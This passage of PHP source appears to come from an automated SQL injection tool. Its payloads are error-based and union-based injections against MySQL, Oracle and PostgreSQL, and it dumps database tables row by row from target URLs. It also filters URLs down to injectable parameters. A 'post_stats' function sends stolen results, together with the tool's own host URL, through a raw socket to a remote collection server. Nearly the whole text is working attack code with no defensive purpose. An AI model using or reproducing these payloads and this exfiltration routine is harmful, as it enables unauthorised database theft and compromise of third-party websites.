$unipl;$database_hex=hexEncode($database);$table_hex=hexEncode($table);$payload_union="CONCAT(0x3a6f79753a,0x4244764877697569706b,0x3a70687a3a)";$payload_error="(SELECT+8041+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+(CASE+WHEN+(8041%3D8041)+THEN+1+ELSE+0+END)),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)";$payload_oracle="(SELECT+(CASE+WHEN+(1=1)+THEN+1+ELSE+0+END)+FROM+DUAL)";$payload_postgre="(SELECT+(CASE+WHEN+(2=2)+THEN+1+ELSE+0+END))";$c = array('+AND+3456=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58)||'.$payload_oracle.'||CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58)||CHR(62)))+FROM+DUAL)');$d = array('+AND+1=CAST((CHR(58)||CHR(111)||CHR(121)||CHR(117)||CHR(58))||'.$payload_postgre.'::text||(CHR(58)||CHR(112)||CHR(104)||CHR(122)||CHR(58))+AS+NUMERIC)');$a = array('%27+AND+'.$payload_error.'+AND+%27MEpR%27%3D%27MEpR','%27)+AND+'.$payload_error.'+AND+(%27ffAM%27%3D%27ffAM','+AND+'.$payload_error.'',')+AND+'.$payload_error.'+AND+(7609%3D7609');if(isset($type)){if(is_array($cols)==true){foreach($cols as $col){if($type=='mysql_eb'){$mode="mysql_error";$query=$a[$index-1]; $querys=str_replace("$payload_error","(SELECT%207656%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20".$database.".".$table."),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)",$query);}elseif($type=='mysql_ub'){$mode="mysql_union";$query=$unipl[$index-1];$querys=str_replace("$payload_union","CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)",$query);$querys=str_replace("%23","%20FROM%20".$database.".".$table."%23",$querys);}elseif($type=='oracle_eb'){$mode="oracle_error";$query=$c[$index-1];$querys=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20COUNT(".$col.")%20FROM%20".$database_hex.".".$table.")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query);}elseif($type=='posgre_eb'){$mode="postgre_error";$query=$d[$index-1];$querys=str_replace("$payload_postgre","(SELECT%20COALESCE(CAST(COUNT(%2A)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.".$table.")",$query);}if($mode=="mysql_error"){$queryn=str_replace("$payload_error",'(SELECT%206968%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST('.$col.'%20AS%20CHAR),0x20)),1,50)%20FROM%20'.$database.'.'.$table.'%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);}elseif($mode=="mysql_union"){$queryn=str_replace("$payload_union",'(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST('.$col.'%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20'.$database.'.'.$table.'%20LIMIT%20$i,1)',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);}elseif($mode=="oracle_error"){$queryn=str_replace("$payload_oracle",'(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST('.$col.'%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20'.$col.'%2CROWNUM%20AS%20LIMIT%20FROM%20'.$database_hex.'.'.$table.'%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);}elseif($mode=="postgre_error"){$queryn=str_replace("$payload_postgre",'(SELECT%20COALESCE(CAST('.$col.'%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.'.$table.'%20OFFSET%20$i%20LIMIT%201)',$query);$i = 0;$count=(GetBetween(file_get_contents($inj.$querys.$sobras))-1);}$lba++;$lba_name[$lba]=$col;$lba_count[$lba]=$count;$lba_queryn[$lba]=$queryn;}$rows_total=max($lba_count)+1;$return['rows_total']=$rows_total;$i=$c_from;if($c_to<$rows_total){$finish=$c_to;}else{$finish=$rows_total;}while ($i < $finish){$this_lba=0;$savedump='';while ($this_lba < $lba){$this_lba++;$query_nombre=str_replace('$i',"$i",$lba_queryn[$this_lba]);$nombre = GetBetween(file_get_contents($inj.$query_nombre.$sobras));$savedump.=$nombre.';';}$savedump=substr($savedump, 0, strlen($savedump)-1);$tosave[]=$savedump;$i++;}$return['rows_done']=$i;}}$return['dump']=$tosave;return $return;}function hexEncode($str){if(is_null($str)){return FALSE;}$hexStr = "";for($i=0;isset($str[$i]);$i++){$char = dechex(ord($str[$i]));$hexStr .= $char;}return "0x".$hexStr;}function GetBetween($content){$r = explode(":oyu:", $content);if (isset($r[1])){$r = explode(":phz:", $r[1]);return $r[0];}return'';}function string_sort($a, $b){if(strlen($a)>strlen($b)){return 1;}elseif(strlen($a)==strlen($b)){return 0;}else{return -1;}}function optimus($urls){$urls=array_unique($urls);natsort($urls);foreach($urls as $url){$urlht=explode("#", $url);$url=$urlht[0];$urlex=explode("=", $url);foreach($urlex as $urlexpart){$urlend=$urlexpart;}$urlstart=substr($url, 0, strlen($url)-strlen($urlend));if(!is_numeric($urlend)){$urls_filt[]=$url;}if($urlstart!=$prev_urlstart){$urls_filt[]=$url;}$prev_urlstart=$urlstart;}$urls_filt=array_unique($urls_filt);natsort($urls_filt);usort($urls_filt, 'string_sort'); foreach($urls_filt as $url){$urlex=explode("=", $url);foreach($urlex as $urlexpart){$urlend=$urlexpart;}$urlstart=substr($url, 0, strlen($url)-strlen($urlend));if(!is_numeric($urlend)){$urls_filt2[]=$url;}if($urlstart!=$prev_urlstart){$urls_filt2[]=$url;}$prev_urlstart=$urlstart;}$urls_filt2=array_unique($urls_filt2);natsort($urls_filt2);return $urls_filt2;}function post_stats($type,$code,$id,$opt,$nfo){global $st, $sd, $eh;$host=explode("/", $sd);$hp=explode(":", $host[0]);if(empty($hp[1])){$hp[1]='80';}$data='tp='.$type.';cd='.$code.';id='.urlencode($id).';op='.urlencode(base64_encode(serialize($opt))).';nf='.urlencode(base64_encode(serialize($nfo))).';sh='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']).';';if($eh){echo $data;}else{$socket = socket_create(AF_INET,SOCK_STREAM,0);socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array("sec" => $st, "usec" => 0));if (!socket_connect($socket, $hp[0], $hp[1])){socket_close($socket);}else{socket_write($socket, "GET http://".$sd."/post.php HTTP/1.1\r\nHost: ".$host[0]."\r\nCookie: ".$data."\r\n\r\n");socket_close($socket);}}}?>